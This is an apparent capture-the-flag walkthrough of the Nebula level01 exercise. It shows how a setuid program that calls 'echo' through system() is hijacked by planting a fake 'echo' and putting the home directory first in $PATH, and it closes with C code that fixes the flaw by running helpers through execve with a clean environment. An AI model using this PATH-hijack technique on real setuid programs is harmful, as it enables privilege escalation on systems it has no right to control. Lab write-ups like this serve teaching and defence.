Nebula Level01
Task
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with password level01. Files for this level can be found in /home/flag01.
Solution
We log in to the machine as level01. According to the task, the files are in the "flag01" home directory:
level01@nebula:~$ cd /home/flag01
level01@nebula:/home/flag01$ ls
flag01
level01@nebula:/home/flag01$
Sifting through the provided source code, we can see a call to the system function that executes echo in an altered environment. Because echo is looked up by name, the directories listed in $PATH decide which file actually runs. This means we can craft our own "echo" program and then alter the $PATH environment variable so that, when we execute the flag01 file, our own echo program is executed in the context of the flag01 owner.
First, we create a file named "echo" in our home directory:
level01@nebula:/home/flag01$ cd ~
level01@nebula:~$
level01@nebula:~$ echo "getflag" > echo
Then we place our home directory, which contains "echo", at the beginning of the $PATH environment variable:
level01@nebula:~$
level01@nebula:~$ export PATH=/home/level01:$PATH
level01@nebula:~$
Executing the flag01 setuid file now runs "getflag" as the flag01 account and yields:
level01@nebula:~$ /home/flag01/flag01
level01@nebula:~$ You have successfully executed getflag on target account
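The fix for this class of bug, as an added example that is not part of the level's source or of the original write-up: a privileged program should start its helper by absolute path with execve and a fixed environment, so the caller's $PATH is never consulted. The names run_trusted and hardened_echo, the /bin/echo location and the message text are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run a helper by absolute path with a fixed environment.
 * Returns the child's exit status, or -1 on refusal or failure.
 * (Hypothetical helper, not from the level's source.) */
static int run_trusted(const char *abs_path, char *const argv[])
{
    /* Constructed minimal environment: nothing is inherited from the caller. */
    char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                 /* refuse names that need a PATH search */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);  /* no shell, no PATH lookup */
        _exit(127);                         /* only reached if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Hardened counterpart of "run echo from a privileged program". */
int hardened_echo(void)
{
    char *const argv[] = { "echo", "constructed message", NULL };
    return run_trusted("/bin/echo", argv);  /* assumed location of echo */
}

int main(void)
{
    /* Same PATH change as in the walkthrough; it has no effect here. */
    setenv("PATH", "/home/level01:/usr/bin:/bin", 1);
    return hardened_echo();
}
```
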
Reference
https://en.wikipedia.org/wiki/Env